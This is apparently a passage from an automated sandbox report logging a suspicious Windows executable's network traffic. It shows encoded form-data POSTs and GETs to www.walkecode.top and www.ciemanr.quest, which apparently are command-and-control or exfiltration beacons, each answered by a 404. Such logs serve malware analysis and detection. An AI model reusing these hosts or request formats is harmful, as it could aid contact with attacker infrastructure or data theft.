                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.walkecode.top
                                                                                  Referer: http://www.walkecode.top/qei1/
                                                                                  Content-Length: 227
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 71 50 71 65 46 31 6a 45 70 67 71 6a 42 51 30 37 4c 55 33 42 4e 76 6d 58 6a 44 32 6b 62 6f 46 6c 78 76 7a 44 41 6c 50 49 4d 62 48 51 7a 4c 65 44 6e 46 72 76 55 53 70 6a 68 75 6c 6b 6f 36 4a 58 75 70 42 62 43 30 67 53 71 45 4b 63 73 4b 30 67 32 4f 45 65 4a 32 79 37 43 2f 79 4a 4e 64 42 72 47 6a 54 6b 58 6e 68 54 52 77 46 68 6c 75 76 68 4d 64 33 6b 2b 32 44 66 70 64 74 4a 6e 47 59 35 55 76 51 56 5a 31 46 73 48 77 6a 65 63 43 46 63 46 73 6a 52 47 49 64 4d 31 62 58 4f 34 72 4e 4f 6a 56 2f 7a 30 6a 6c 6c 6e 4c 52 51 64 47 43 34 76 56 35 39 74 2b 67 55 37 64 73 4a 32 63 57 56 65 38 70 78 55 54 64 74 67 49 39 55 2f 4b 4a 67 31 53 6e 65 73 7a 58 59 46 42 32 50
                                                                                  Data Ascii: LDVlCz=qPqeF1jEpgqjBQ07LU3BNvmXjD2kboFlxvzDAlPIMbHQzLeDnFrvUSpjhulko6JXupBbC0gSqEKcsK0g2OEeJ2y7C/yJNdBrGjTkXnhTRwFhluvhMd3k+2DfpdtJnGY5UvQVZ1FsHwjecCFcFsjRGIdM1bXO4rNOjV/z0jllnLRQdGC4vV59t+gU7dsJ2cWVe8pxUTdtgI9U/KJg1SneszXYFB2P
                                                                                  Dec 12, 2024 00:19:22.001977921 CET691INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 11 Dec 2024 23:19:21 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.549864124.71.162.21805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:19:23.218812943 CET1792OUTPOST /qei1/ HTTP/1.1
                                                                                  Host: www.walkecode.top
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.walkecode.top
                                                                                  Referer: http://www.walkecode.top/qei1/
                                                                                  Content-Length: 1243
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 71 50 71 65 46 31 6a 45 70 67 71 6a 42 51 30 37 4c 55 33 42 4e 76 6d 58 6a 44 32 6b 62 6f 46 6c 78 76 7a 44 41 6c 50 49 4d 62 66 51 79 35 47 44 31 30 72 76 46 69 70 6a 36 4f 6c 35 6f 36 4a 61 75 70 4a 58 43 31 63 6f 71 47 79 63 74 6f 73 67 30 37 6f 65 43 32 79 37 64 76 79 55 51 74 41 70 47 6a 44 67 58 6e 78 54 52 77 46 68 6c 74 33 68 63 5a 44 6b 38 32 44 63 2f 4e 74 46 78 32 5a 33 55 76 70 67 5a 32 70 61 45 41 44 65 66 69 31 63 48 65 37 52 62 59 64 4f 67 62 58 73 34 72 42 72 6a 56 54 2f 30 6a 67 79 6e 4a 42 51 63 53 62 33 32 68 4e 6b 36 66 67 51 33 4b 77 45 32 5a 47 7a 65 4e 51 4b 5a 52 68 78 70 35 46 43 71 50 78 58 7a 44 47 6f 31 48 53 58 55 6c 47 50 6e 6d 58 57 41 33 53 6e 6d 72 2f 64 41 30 53 4c 6a 38 43 63 55 4e 64 46 62 4c 43 37 64 69 67 64 39 4a 54 4c 54 44 49 64 46 66 53 66 45 71 54 4f 70 34 33 4e 32 62 41 61 59 4c 6c 73 59 35 35 6b 67 78 38 64 66 76 53 4a 49 6f 4e 34 6b 51 48 39 50 66 70 73 6f 72 63 59 63 2f 64 4a 42 4e 74 7a 4b 32 61 35 4a 56 39 55 78 2b 4b 58 43 43 45 [TRUNCATED]
                                                                                  Data Ascii: LDVlCz=qPqeF1jEpgqjBQ07LU3BNvmXjD2kboFlxvzDAlPIMbfQy5GD10rvFipj6Ol5o6JaupJXC1coqGyctosg07oeC2y7dvyUQtApGjDgXnxTRwFhlt3hcZDk82Dc/NtFx2Z3UvpgZ2paEADefi1cHe7RbYdOgbXs4rBrjVT/0jgynJBQcSb32hNk6fgQ3KwE2ZGzeNQKZRhxp5FCqPxXzDGo1HSXUlGPnmXWA3Snmr/dA0SLj8CcUNdFbLC7digd9JTLTDIdFfSfEqTOp43N2bAaYLlsY55kgx8dfvSJIoN4kQH9PfpsorcYc/dJBNtzK2a5JV9Ux+KXCCErOHja5q5Q739VDgxodneWOoa8lV0l5SlNr/QkZVQm1kvHLAmFl55cTtba5IL59SrRGDQXjaIkI32S7VQtozq0SyVemaSTSppkDXXrldbQ/73Bs1nEiFxwDEteZYTHtmPdyxBn2Fat0zVraVIlv8h8kCuuqacc4OeRX6xpt443BtfoNGkoLAh4K1xLIPqBpsYmbGVBBh2p95A9jOeif044nEkVWkD1VuGxUvHa4VoEgGh7SlY0Zg77Z3bU4HpH4zGcZMFGpx2i3Wylrsw6YNHIZTWbF+t4ZjKMi0JDFFq8JQ9omCYq3R8JW/kS6DL8Me/lBg3P9/FR5hqulesB/a4QZcL58EZd4jFbgWCLn5M2m2ao9Eyh3JJE64BNV6x+7TioqWZ1qyN/YG+H+e4/yWcdN22N30dsPk4SZiZ7TudvVoWmj9DoOCDbqKOTYW3AHZ+wTdNXHHPk0q7x8TL/z8bUNVJsBjBlFtaX2sKothckCntwIoIBCpamHjUhcMZg7saapXs2oiHv6a75jGKobWw/RDUf93EF3rGUO6vEUzkXyEGPDp8H/dQpWlGbHCNGqVr6FMwZsaE/Qg2B2eGxM5lHwrZcoH/FPb5GgzlxdNw0sKlnsu1mGEwi1WcIcg8VjlrUB00SQL0GLVONh0jjNR0smWEaRzx7vVxyQ [TRUNCATED]
                                                                                  Dec 12, 2024 00:19:24.709273100 CET691INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 11 Dec 2024 23:19:24 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.549873124.71.162.21805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:19:25.874519110 CET504OUTGET /qei1/?LDVlCz=nNC+GBX2ggWuM05tEEqRTuHIkAvcf+dXy/bvByniPoLRj52NglzWV1Nft7BNtL9++4tRfUwg9XmNi4A2kp9kOCOyWvDUT5wtJii7I2tTBBgakefdRMv39WDJ4M987EpnCg==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
                                                                                  Host: www.walkecode.top
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Dec 12, 2024 00:19:27.352281094 CET691INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 11 Dec 2024 23:19:27 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.549889150.109.11.247805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:19:33.273760080 CET755OUTPOST /gejp/ HTTP/1.1
                                                                                  Host: www.ciemanr.quest
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.ciemanr.quest
                                                                                  Referer: http://www.ciemanr.quest/gejp/
                                                                                  Content-Length: 207
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 4d 2b 4e 6b 4f 2b 34 56 69 74 30 62 78 30 2b 56 56 4a 43 72 32 46 77 65 68 76 65 62 54 31 36 61 44 6c 74 45 42 79 4c 6e 4f 33 5a 61 4c 4a 6d 4d 6f 78 46 54 36 33 72 56 62 38 35 78 49 7a 56 63 47 61 57 4c 38 76 39 77 71 52 62 64 73 4e 7a 32 4d 76 37 63 30 63 72 43 4b 66 63 43 76 6d 39 37 78 48 6e 6b 52 4b 51 54 57 72 67 49 52 6a 50 39 4a 47 73 37 61 34 2b 72 41 36 7a 31 56 7a 78 6c 47 34 37 6d 4e 4f 58 71 70 72 68 75 31 52 4c 68 6e 66 47 34 62 4f 77 68 52 4f 74 77 35 67 75 55 2f 5a 45 45 69 6b 61 74 64 46 4e 6d 55 57 52 71 58 71 75 48 61 7a 44 47 54 72 44 4a 50 69 57 77 70 73 70 44 32 4b 6b 3d
                                                                                  Data Ascii: LDVlCz=M+NkO+4Vit0bx0+VVJCr2FwehvebT16aDltEByLnO3ZaLJmMoxFT63rVb85xIzVcGaWL8v9wqRbdsNz2Mv7c0crCKfcCvm97xHnkRKQTWrgIRjP9JGs7a4+rA6z1VzxlG47mNOXqprhu1RLhnfG4bOwhROtw5guU/ZEEikatdFNmUWRqXquHazDGTrDJPiWwpspD2Kk=
                                                                                  Dec 12, 2024 00:19:34.830887079 CET708INHTTP/1.1 404 Not Found
                                                                                  Server: Tengine
                                                                                  Date: Wed, 11 Dec 2024 23:19:34 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.549896150.109.11.247805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:19:35.938417912 CET775OUTPOST /gejp/ HTTP/1.1
                                                                                  Host: www.ciemanr.quest
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.ciemanr.quest
                                                                                  Referer: http://www.ciemanr.quest/gejp/
                                                                                  Content-Length: 227
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 4d 2b 4e 6b 4f 2b 34 56 69 74 30 62 77 56 4f 56 51 75 75 72 30 6c 77 64 39 2f 65 62 64 56 37 54 44 6c 78 45 42 32 62 33 4f 6c 4e 61 4c 73 4b 4d 70 77 46 54 30 58 72 56 51 63 35 4f 47 54 56 56 47 61 53 44 38 71 64 77 71 52 6e 64 73 4d 44 32 50 59 58 44 31 4d 72 41 47 2f 63 41 77 57 39 37 78 48 6e 6b 52 4b 45 35 57 72 49 49 52 53 2f 39 49 6b 55 34 53 59 2b 73 44 36 7a 31 52 7a 78 70 47 34 36 31 4e 4c 50 41 70 74 74 75 31 51 37 68 70 74 69 37 4d 65 77 6e 66 75 73 56 2b 6a 79 66 2f 50 45 61 68 48 65 6f 4d 48 46 69 56 67 67 41 4e 49 6d 76 4a 54 76 2b 44 34 4c 2b 65 53 33 5a 7a 50 35 7a 6f 64 78 6a 51 70 2f 52 76 44 75 6d 75 59 63 53 6c 68 59 71 6d 30 58 67
                                                                                  Data Ascii: LDVlCz=M+NkO+4Vit0bwVOVQuur0lwd9/ebdV7TDlxEB2b3OlNaLsKMpwFT0XrVQc5OGTVVGaSD8qdwqRndsMD2PYXD1MrAG/cAwW97xHnkRKE5WrIIRS/9IkU4SY+sD6z1RzxpG461NLPApttu1Q7hpti7MewnfusV+jyf/PEahHeoMHFiVggANImvJTv+D4L+eS3ZzP5zodxjQp/RvDumuYcSlhYqm0Xg
                                                                                  Dec 12, 2024 00:19:37.480165005 CET708INHTTP/1.1 404 Not Found
                                                                                  Server: Tengine
                                                                                  Date: Wed, 11 Dec 2024 23:19:37 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.2.549902150.109.11.247805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:19:38.593681097 CET1792OUTPOST /gejp/ HTTP/1.1
                                                                                  Host: www.ciemanr.quest
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.ciemanr.quest
                                                                                  Referer: http://www.ciemanr.quest/gejp/
                                                                                  Content-Length: 1243
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 4d 2b 4e 6b 4f 2b 34 56 69 74 30 62 77 56 4f 56 51 75 75 72 30 6c 77 64 39 2f 65 62 64 56 37 54 44 6c 78 45 42 32 62 33 4f 6c 56 61 4c 61 65 4d 6f 54 39 54 31 58 72 56 5a 38 35 31 47 54 55 58 47 63 36 48 38 71 5a 47 71 58 72 64 2b 65 4c 32 45 4b 76 44 67 63 72 41 62 50 63 42 76 6d 39 55 78 42 48 6f 52 4b 55 35 57 72 49 49 52 51 6e 39 42 57 73 34 55 59 2b 72 41 36 7a 68 56 7a 78 4e 47 34 6a 41 4e 4c 44 36 70 64 4e 75 31 77 72 68 6b 2f 36 37 50 2b 77 6c 53 4f 73 33 2b 6a 2f 48 2f 50 77 57 68 45 44 48 4d 46 56 69 58 31 46 68 56 49 2b 30 49 41 6a 5a 4e 50 43 53 66 58 50 59 74 4a 6f 44 74 4b 68 2f 4d 36 48 64 6d 31 53 34 6e 63 5a 35 7a 46 74 35 69 41 69 70 62 75 6f 43 56 6d 72 49 42 69 36 41 55 7a 4c 45 43 67 70 43 6e 73 51 42 68 75 34 37 62 53 6b 35 34 75 51 61 78 45 38 5a 64 36 35 4d 32 38 30 52 6b 2f 7a 7a 7a 56 51 78 2b 4f 74 42 76 2f 6e 6c 44 41 61 6c 38 48 72 2f 70 46 73 6c 55 53 6d 55 42 31 64 61 6d 4e 56 6f 35 31 7a 79 47 75 35 47 56 4b 66 4e 46 4b 54 69 49 30 43 64 43 6a 38 [TRUNCATED]
                                                                                  Data Ascii: LDVlCz=M+NkO+4Vit0bwVOVQuur0lwd9/ebdV7TDlxEB2b3OlVaLaeMoT9T1XrVZ851GTUXGc6H8qZGqXrd+eL2EKvDgcrAbPcBvm9UxBHoRKU5WrIIRQn9BWs4UY+rA6zhVzxNG4jANLD6pdNu1wrhk/67P+wlSOs3+j/H/PwWhEDHMFViX1FhVI+0IAjZNPCSfXPYtJoDtKh/M6Hdm1S4ncZ5zFt5iAipbuoCVmrIBi6AUzLECgpCnsQBhu47bSk54uQaxE8Zd65M280Rk/zzzVQx+OtBv/nlDAal8Hr/pFslUSmUB1damNVo51zyGu5GVKfNFKTiI0CdCj82+meHm5vUMMD95FxCF77VPg0zLN3kfjJcPj9oqNMuSZuFq9hyPbxfW9yidqJ90qu+yIQRvc9IxdAsX8gBRsmiWH7y5cr3zQ/ns5eBP/ytJJhVbXC8PVdrPldAf9j7vA260ZuXG1sv6526su0YM3PxJ4ZH0pSL2GWlNWrlzwV/yGfVyw2PEKz3knEo2Z7h913lKy8i1+9QiYxsiMo7DdT6Vil+art3EFDtrUxV9qtpCsS0I77Krh2m1JokiZQrUkA1lFbXlnVYwoCbCrjwyISbZNpi4YpgZ82MP7HRcfUhc6mMGHQwJEze0ZOX8SwQBrUMGJ0SYOsN9zB2PeFSXRZPJBosAg76ZlC22CL2sQSR49mND4xd0u376+ejqYAuP/rI6WE8eSpwiMyT1q+fbdPSdHFvs5frWtNyeBZUTo+EK21Ss8CYW9Xv7DhRgLu1JDmMjon+bv38CmPVkln+ZNdGevnqh/RxWYEtwdEBepXfUCF8QIJZmkbdsTy2nQialtAVqvtqnUG+K0AjsijbhYelGjno5Vu3CUzLECB9VMJPkaxH8rsT8onukoyoM4XxwcfoDyQ+R2l+R7SCZ3Tr3QcBCl25cNOv7o6atUK0Y9Th6NTX7tXKOKMYp69NSqlFgm0cghV/fVWuJkPA/fUaPjAP69LQii+HZK6Bu [TRUNCATED]
                                                                                  Dec 12, 2024 00:19:40.287234068 CET708INHTTP/1.1 404 Not Found
                                                                                  Server: Tengine
                                                                                  Date: Wed, 11 Dec 2024 23:19:39 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 548
                                                                                  Connection: close
